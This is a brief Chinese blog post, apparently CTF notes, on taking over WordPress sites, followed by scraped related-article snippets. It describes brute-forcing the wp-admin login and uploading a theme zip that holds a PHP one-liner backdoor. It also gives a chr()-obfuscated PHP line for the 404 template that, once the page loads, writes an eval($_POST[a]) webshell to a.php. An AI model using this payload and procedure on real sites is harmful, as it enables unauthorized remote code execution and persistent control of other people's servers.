worldpress是一款主流的博客系统，但是关于它的漏洞也层出不穷。
这次是因为一次CTF靶场遇到此类情况，顺便做个简单记录。

worldpress系统本身比较安全，但是因为它可以自定义插件，很多时候因为插件作者安全开发的能力有高有低，导致许多安全漏洞的出现。

0x01 弱口令利用链

后台默认地址为：xxxx/wp-admin/

没有验证码可以暴力破解，常见用户名admin,worldpress,system等。

进入后台后的利用：

1 上传主题包getshell

本机建立目录“upkn”,把一句话1.php放进去。打包upkn目录为zip文件。WP后台的主题管理，上传主题，安装。则你的后门路径为：
wp-content/themes/upkn/1.php。

2 修改主题文件

“外观”-“编辑”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径，默认是wp-content/themes/twentyten/404.php
更新完直接访问localhost/wp-content/themes/twentyten/404.php就会在twentyten目录生成一句话后门a.php 密码a

0x02 插件漏洞利用

插件漏洞类型很多，例如xss,sql注入，rce等。

推荐工具方便自查：https://github.com/wpscanteam/wpscan

Worldpress常规利用思路相关推荐

1. 阅读理解常规解题思路

   阅读理解常规解题思路: 首先第一步,通用引擎首先会通过问题分析获取到文本相关的内容,然后根据问句中各个词离"()"的距离计算出问句中每个关键词的重要性,得到关键词表. 第二步,是提 ...

2. java 反序列化漏洞 利用思路简介

   目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后 ...

3. CTF(Pwn) Rop + ret2libc 题型 常规解法思路 (初级)

   参考例题 https://blog.csdn.net/weixin_45556441/article/details/115091036 引子 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码 ...

4. fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册（一）

   作者:Qftm 合天智汇 前言 这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结. 相关函数 四个函数 php中引发文件包含漏洞的通常主要是以下四个函数: 1.include ...

5. PHP文件包含漏洞利用思路与Bypass总结手册（一）

   本文作者:Qftm 目录 前言 相关函数 四个函数 函数功能 函数差异 漏洞原因 漏洞分类 包含姿势 php伪协议 php://filter file:// php://input file_get_ ...

6. WMI（windows management instrumentation）利用思路简介

   WMI利用思路简介 概述 windosw管理工具,windows98以后的操作系统都支持WMI, 用于提供共同的界面和对象模式以便访问有关操作系统.设备.应用程序和服务的管理信息.如果此服务被终止,多 ...

7. 从DesperateCat学到的Tomcat下的新利用思路

   文章目录 题目环境 分析 两个重要的Trick 探索开始 如何利用org.apache.jasper.compiler.StringInterpreter 加载恶意类到JVM 梳理利用思路 结果 题目 ...

8. LeetCode 678 有效的括号字符串，常规栈思路

   题:给定一个只包含三种字符的字符串:( ,) 和 *,写一个函数来检验这个字符串是否为有效字符串.有效字符串具有如下规则: 任何左括号 ( 必须有相应的右括号 ). 任何右括号 ) 必须有相应的左括号 ...

9. php反序列化漏洞中当不存在__invoke时的一种利用思路

   存在这样两个类,找不到可以利用的__invoke时,如何获得shell class a{public $code;public function __destruct(){$test=$this-&g ...

10. php伪协议读取目录,PHP文件包含，文件读取的利用思路，以及配合伪协议的trick...

    PHP的文件包含函数有两类,分三种:1 2file_get_contents() include()/include_once() require/require_once() 第一种用于获取文件的数 ...

最新文章

1. ubuntu下SVN服务器安装配置
2. LinuxMint（Ubuntu）安装文泉驿家族黑体字
3. geopy 在python中的使用
4. ABP(现代ASP.NET样板开发框架)系列之2、ABP入门教程
5. 用户计算机可以通过电话拨号,用户计算机可以通过大型局域网、小型局域网、无线连接、电话拨号和（）等方式接入Internet。...
6. 你可能不需要 jQuery！使用原生 JavaScript 进行开发
7. 基础知识—条件判断语句-switch语句
8. Javascript、Jquery获取浏览器和屏幕各种高度宽度
9. MS SQL安装提示
10. Python：functools.cmp_to_key(func)使用
11. sqlserver sql行专列_Sqlserver 列转行 行转列
12. 编译telepresence：没有规则可制作目标“tinywrap/ActionConfig.cxx”，由“telepresence-ActionConfig.o” 需求。
13. redo synch writes在什么情况下发生
14. GPL和LGPL的区别！
15. 上拉电阻与下拉电阻总结 与 GPIO框图分析
16. CFA2级组合管理笔记
17. 欧姆龙 PLC 程序NJ ST语言EtherCat总线控制24个伺服轴大型程序电池生产线
18. 0基础可以学习大数据吗？
19. 微信小程序实现html格式内容
20. 学计算机技术的手机APP,软考助手(计算机技术考试)

热门文章

1. 独孤木专栏Delayed Project（中） (转)
2. miRNA与 lncRNA的相互调控作用
3. Crate安装和配置
4. Rust：error[E0468]: an `extern crate` loading macros must be at the crate root 处理方法
5. Echarts Map地图类型使用
6. Proxmox(PVE) Web 控制面板添加登录二步验证(TFA)
7. 阿里云CDN 使用问题汇总
8. 【语音智能管家】之语音唤醒（附演示视频）
9. DDD战略建模在重构业务系统时的实践
10. 范式的判定——数据库考试复习